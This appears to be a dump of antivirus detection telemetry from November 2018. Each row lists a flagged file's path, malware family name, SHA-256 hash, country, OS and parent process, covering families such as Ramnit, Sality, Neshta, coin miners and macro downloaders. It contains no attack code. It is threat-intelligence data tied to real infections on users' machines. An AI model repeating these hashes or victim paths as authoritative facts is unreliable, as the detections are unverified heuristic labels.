  Row(detection=Row(filename='avscan-20181104-235117-e84e638f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181104-235006-E0E11983\\AVSCAN-20181104-235117-E84E638F', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:22:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T17:31:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151134-ce4720d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3a2c535a\\AVSCAN-20181104-151026-C34B6B26\\AVSCAN-20181104-151134-CE4720D5', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:09:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10345936\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/host:Z0R0dF1rWwMqHHVrT2gQGWIcZXFMfwocYxZydBV9Shc6Pg4yCA4jFzo+d1hqG0VoOV4XPHgQUnY3NWBGZHA0AykyZkwMAFZ+PDFuUFlJC2p2ZjK0Pw \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\CD - TOP SERTANEJO SETEMBRO 2018_0672315896.exe', parentsize=2405472, timestamp='2018-11-04T03:21:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\hkiugqukypd\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:26:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:09:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dccw.exe', filepath='E:\\Windows\\System32\\dccw.exe', filesize=896000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='1148c9091e120f00e686b6e47097c37786b865d5ed4ea6c7bdcd82f036f1869e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T11:27:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204259-90d0fe28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7c04be1a\\AVSCAN-20181104-203831-6219C626\\AVSCAN-20181104-204259-90D0FE28', filesize=832000, name='HEUR/APC.#M1.#R1'), hash='c04100433a92893732ec84902b22532a3f937c0efa604f7589c5332599a565c0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:40:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:27:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150835-d541cd30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b757a3b9\\AVSCAN-20181104-145110-438383C3\\AVSCAN-20181104-150835-D541CD30', filesize=3072000, name='TR/VBCrypt.gwtfm.#M1.#R1'), hash='8ae0ac96a2953b547b712807daa8a8d2b66bf59936f3060f93e9f7154d03f8bc', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:08:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-172534-c970b1f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0bc51104\\AVSCAN-20181104-165011-9512470A\\AVSCAN-20181104-172534-C970B1F6', filesize=128000, name='ADWARE/Adware.Gen7.#M1.#R1'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:25:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='civ3conquestsedit.exe', filepath='F:\\Infogrames Interactive\\Civilization III\\Conquests\\Civ3ConquestsEdit.exe', filesize=1472000, name='W32/Almanahe.C.#M1.#R1'), hash='60eaca1925c7cb8b96eb4a00edd054d96ef1a47bb10589ca66c0c058b9757dc8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:M2lv44Lh9kuhRVWb.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T19:39:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='toolregistrysearch.exe', filepath='C:\\Program Files (x86)\\WinUtilities\\ToolRegistrySearch.exe', filesize=320000, name='W32/Neshta.A.#M1.#R1'), hash='8489184fb747ef927b1e1f587a634b75a3d3c4e51cce1db6dc16897205bec744', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:54:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T07:39:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='1_11_7_5.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\1_11_7_5.html', filesize=220000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='cca418226f4048651108b518a0982e3deb1b38c243d084bfef643f8932377075', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T07:49:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gpusniffer.exe', filepath='C:\\Program Files (x86)\\Adobe\\Adobe Audition CS6\\GPUSniffer.exe', filesize=100000, name='W32/Sality.AT.#M1.#R1'), hash='194728e585494a63ef409177dd1058087fedabc08a76dfe6fc6f74cf585a65ba', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:p0ptgrdLEkqKYPtp.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T19:11:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:05:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-04T00:49:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T13:46:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='medalwall.exe', filepath='C:\\360SANDBOX\\SHADOW\\Program Files (x86)\\360\\Total Security\\MedalWall.exe', filesize=1468000, name='W32/Neshta.A.#M1.#R1'), hash='aa6cac1e7c9e0d89fa8f7388da4f8905a2d161e68d53c7a69ae35f174102937c', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:36:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-192129-1094e9ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b92ce33d\\AVSCAN-20181104-192047-0844BBB0\\AVSCAN-20181104-192129-1094E9BA', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:21:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-065751-c297ac04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99b6583d\\AVSCAN-20181105-063616-3B39D34A\\AVSCAN-20181105-065751-C297AC04', filesize=6200000, name='ADWARE/InstMonster.Gen7.#M1.#R1'), hash='40a2b8bcb78afb68c633b08ba494345f271f77e2173f8caf08d2c7fbe17c91ae', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:58:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151647-dc8e62cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5dd10c7b\\AVSCAN-20181104-150719-909FFCA3\\AVSCAN-20181104-151647-DC8E62CC', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:16:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='nipping.exe', filepath='\\\\?\\C:\\Windows\\nipping.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a72ac5f3d4fcb9fb4b89e7b8c81d9ed761cf150e32ff2fbc9bbd49ea15134bf8', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:07:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-105951-672ec82f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ba0a0959\\AVSCAN-20181104-105929-645A3C21\\AVSCAN-20181104-105951-672EC82F', filesize=512000, name='TR/Chydo.TF.#M1.#R1'), hash='ba6c820d9281c89bd6fb700d5485676e7e4a5450ff7f1d66ca8d237933515100', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:59:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rme.exe', filepath='C:\\Users\\X\\Documents\\Visual Studio 2013\\Projects\\Rme\\Rme\\bin\\Debug\\Rme.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4380'), hash='bf3342bc48196dfb7e8efd2f35987ddfbee2e77bdd36a77e75c72fc4d14ef6ce', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:39:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-233206-b32dcd4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_89e497ab\\AVSCAN-20181103-230631-1EB43BCA\\AVSCAN-20181103-233206-B32DCD4F', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:55:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\miner.crypto.tm\\miners\\Win\\Equihash\\Ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Programs\\miner.crypto.tm\\Crypto Miner.exe', parentsize=67460040, timestamp='2018-11-02T00:31:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dhl shipment.ace --> dhl shipment.exe', filepath='DHL SHIPMENT.ace --> DHL SHIPMENT.exe', filesize=584000, name='TR/Dropper.VB.b73de8.#M1.#R1'), hash='b73de8b732af32fb43df6569998f4a9b0ee2c681356b0858dffe2f4c5f05ad9c', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T01:51:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221932-83dda408', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221829-7A5CEC69\\AVSCAN-20181102-221932-83DDA408', filesize=64000, name='BDS/Rogue.766077.#M1.#R1'), hash='be37e8db54be4ab3f6336804357cd17c9b97e65cdb98cb4242bf352aa9ca0f8d', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:19:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-172136-16ed3f2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c1e6306a\\AVSCAN-20181102-172111-12EEB01C\\AVSCAN-20181102-172136-16ED3F2D', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='a3f1f27443b1201b01fefdae9e5b5f27a3ac6422359ea85a8f89a2d5d080e148', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:21:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ptanks.exe', filepath='H:\\GAMES\\العاب خفيفة\\الدبابه\\PTANKS.EXE', filesize=64000, name='TR/Patched.Gen.#M300.#R3369'), hash='8e3bb65d5edb5114926400ed08d41ff45584dfd1fe5bb5178f2fd153bf9c21d3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-02T15:24:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='usbwriteprotector.exe', filepath='H:\\HBCD\\Programs\\USBWRITEPROTECTOR.EXE', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cfp.exe', filepath='J:\\Tool\\Miracle\\Miracle Box_Cracked 2.58\\Miracle Box_Cracked 2.58\\TOOLS\\Blackberry\\cfp\\cfp.exe', filesize=15104000, name='W32/Ramnit.CD.#M1.#R1'), hash='ed81f1899e9a54f6e2f6b83cb5c036a2255de9fe811532830833d5ba0304591b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-02T05:17:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Program Files (x86)\\Common Files\\HTTPERR\\MsiexeC64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T22:38:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00009945', filepath='C:\\Windows\\Temp\\7f5b9737-675c-495e-87ce-d1069427a961\\tmp00000391\\tmp00009945', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='79f29d55aff8c6fefe9fe7fadd7e5bd62be7c8082cd456e814c2981d2177dab6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T11:04:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ripforgames.exe', filepath='F:\\Prince Of Persia - The Two Thrones\\RipForGames.EXE', filesize=5696000, name='W32/Virut.Gen.#M1.#R1'), hash='dc9ed4bd63ee1e2bf73a1eb7a387cb4fd04dd3e879881ddc4382b1b415288a27', metadata=Row(cmdline='\\\\\\/onboot', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe', parentsize=3986544, timestamp='2018-11-02T23:32:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='postmig.exe', filepath='\\\\ts-xelcea\\share\\tasferimento\\windowseasytransfer\\x86\\PostMig.exe', filesize=640000, name='W32/Stanit.#M1.#R1'), hash='c7cd3eab885a5d4701bb5e346d1e27883593b7930c4e33e1959b3d36d9f415d4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:37:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='报总部201306投顾提成表.xls', filepath='F:\\CJ\\U盘备份\\20160613(新老划断资料勿删除)\\工作资料\\财富证券工作资料\\工作资料\\投顾资料\\资料\\投顾业绩提成明细\\2013\\公司上报提出表\\报总部201306投顾提成表.xls', filesize=128000, name='HEUR/Macro.Downloader.ZAP.Gen.#M1.#R1'), hash='72fb1b1fdf6460845b84b6d8140470ec90b16929bcc160bb4c3e836bac9ee404', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T01:39:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00658c2f', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp00658c2f', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:45:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='installd.exe', filepath='C:\\Windows\\SysWOW64\\installd.exe', filesize=128000, name='ADWARE/Amonetize.ges.#M1.#R1'), hash='dbe316bd9fe59819848abf89caab1b764b33c6ffe65f880de8ca4700e974e3d6', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:21:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='software_reporter_tool.exe', filepath='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', filesize=13696000, name='W32/Infector.Gen8.#M300.#R700734'), hash='d2babf16a93f20b688c9ebf83ab1ded96a2c4a7666a9081dc5b89f87a9da9acf', metadata=Row(cmdline='\\\\\\/Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dllhost.exe', parentsize=248320, timestamp='2018-11-02T14:07:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090844-0274a24c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d6202e76\\AVSCAN-20181102-090809-FDBBFAEF\\AVSCAN-20181102-090844-0274A24C', filesize=108000, name='PUA/Outbrowse.Gen.#M300.#R5615'), hash='876ce9a4d711a29f0469c1f9e20d566d8534dff2159291a720e1912ad6b684db', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bhkbont.exe', filepath='c:\\users\\X\\appdata\\roaming\\bhkbont.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T19:41:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maxxaudiometers.exe', filepath='G:\\MOTHERBOARD DRIVER\\Audio\\REALTEK\\(6728)\\Vista\\MaxxAudioMeters.exe', filesize=2752000, name='W32/Sality.AG.#M1.#R1'), hash='ad49d7c55d4c7cd28af8dbec9094bd35b60d1c19d923040255a184f995dd2e49', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:18:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-030312-5551d72e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-030312-5551D72E', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='b8b0c4ced6f4940ad618504357ee6f92fc54251c20d762162f50b9a683781759', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:05:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110811-c90d04bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ecee166\\AVSCAN-20181102-110735-C33353C8\\AVSCAN-20181102-110811-C90D04BC', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-125053-a15e4344', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-124637-83A78E9C\\AVSCAN-20181102-125053-A15E4344', filesize=128000, name='Adware/AD.Elex.wfnhx.#M1.#R1'), hash='a393a64f854d2cfefb2ce8d2af8cd047993e12258ca24c31ec3e54d6ebcff0f2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:48:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lust_and_power.exe', filepath='\\\\?\\D:\\загрузки\\Lust_and_Power-1.2.b\\Lust_and_Power-1.2.b-pc\\Lust_and_Power-1.2.b-pc\\Lust_and_Power.exe', filesize=128000, name='TR/Crypt.ZPACK.Gen.#M300.#R2504'), hash='f944b967950e2a63ae409719695c20f479ac847d801faab7805e0b867f7a6781', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:39:27Z'), dt=datetime.date(2018, 11, 2)),
